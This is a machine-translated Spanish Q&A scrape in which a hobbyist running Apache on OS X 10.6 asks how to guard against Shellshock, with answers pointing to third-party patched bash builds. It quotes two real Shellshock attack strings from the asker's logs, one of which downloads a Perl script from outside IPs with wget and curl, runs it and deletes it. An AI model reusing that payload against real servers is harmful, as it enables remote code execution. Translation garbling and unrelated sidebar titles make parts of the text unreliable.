Apple Shellshock parche para 10.6?

Estoy ejecutando un pequeño server HTTP (Apache) fuera de mi Mac principalmente como un hobby. Si se pone en peligro, no es el fin del mundo, pero es algo que ciertamente me gustaría evitar. Configuré un trabajo de launchctl para verificar el file de logging de Apache para posibles requestes relacionadas con Shellshock y anoche recibí dos inputs relacionadas:

82.221.128.246 - - [29/Sep/2014:08:14:41 -0400] "GET / HTTP/1.1" 200 2081 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"" 173.45.100.18 - - [29/Sep/2014:00:52:07 -0400] "GET /cgi-bin/hi HTTP/1.0" 404 208 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"" 

El primero parece inofensivo y el IP alberga un website de aspecto muy legítimo, alegando que sus requestes son solo para fines de investigación. El segundo es una historia diferente, sin embargo, trata de download y ejecutar un script de Perl. Afortunadamente, no tengo instalado wget, por lo que este ataque no funcionó, pero parece que es solo cuestión de time antes de que reciba una request como esta que causa algún daño.

  • El mes 13 está fuera de límites?
  • Cambiar el background del escritorio en OS X 10.8 solo lo cambia para el espacio de escritorio actual
  • "Su sistema se ha quedado sin memory de la aplicación", pero la presión de la memory no es siquiera del 50%?
  • ¿Cómo se obtienen los files de diagnóstico del sistema de OS X?
  • La pantalla de la MacBook tiene líneas verticales en blanco y negro al inicio
  • MacBook Pro - mediados de 2010 - Errores de memory en AHT
  • Apple acaba de lanzar parches para OS X 10.7 y posterior, pero desafortunadamente estoy ejecutando 10.6. ¿Qué medidas simples y confiables puedo tomar (es decir, no recomstackr bash ) para networkingucir mis riesgos?

  • El post de error "el dispositivo usb estaba consumiendo demasiada energía"
  • ¿Cómo informo un error en Safari 6.0?
  • Mac OS 10.10 Yosemite: ¿Dónde obtengo el parche para reparar el exploit Meltdown?
  • ¿Cómo encontrar la extensión del buscador infractora?
  • ¿El intercambio de pantalla en Sierra es seguro, es decir, una connection completamente encriptada?
  • Finder no se inicia en Mountain Lion (10.8.2)
  • 3 Solutions collect form web for “Apple Shellshock parche para 10.6?”

    Si no quiere comstackr Bash usted mismo, la gente de TenFourFox (que hace una versión PPC de Firefox) compiló un binary que funciona en OS X 10.4 – 10.9 tanto en PPC como en Intel Macs, y tiene instrucciones de terminal para instalar:

    http://tenfourfox.blogspot.com/2014/09/bashing-bash-one-more-time-updated.html

    En el momento de la networkingacción (30 de septiembre) han comstackdo Bash 4.3.27, pero esto todavía se pierde un par de vulnerabilidades que el parche oficial de Apple también se ha perdido. Por lo tanto, es mejor que nada, pero querrá seguir buscando futuras actualizaciones.

    Posiblemente podrías intentar recomstackr bash usando este enlace. Parchea la versión bash vulnerable, pero la nueva versión no está firmada por Apple y posiblemente podría romper cosas.

    Verifique la sección "Binarios del sistema" de esta respuesta. Funciona para 10.6.8, suponiendo que tiene Xcode instalado.

    https://apple.stackexchange.com/a/146851/96606

    Loving Apple Products like poisoning (iPhone, iPad, iMac, Macbook, iWatch).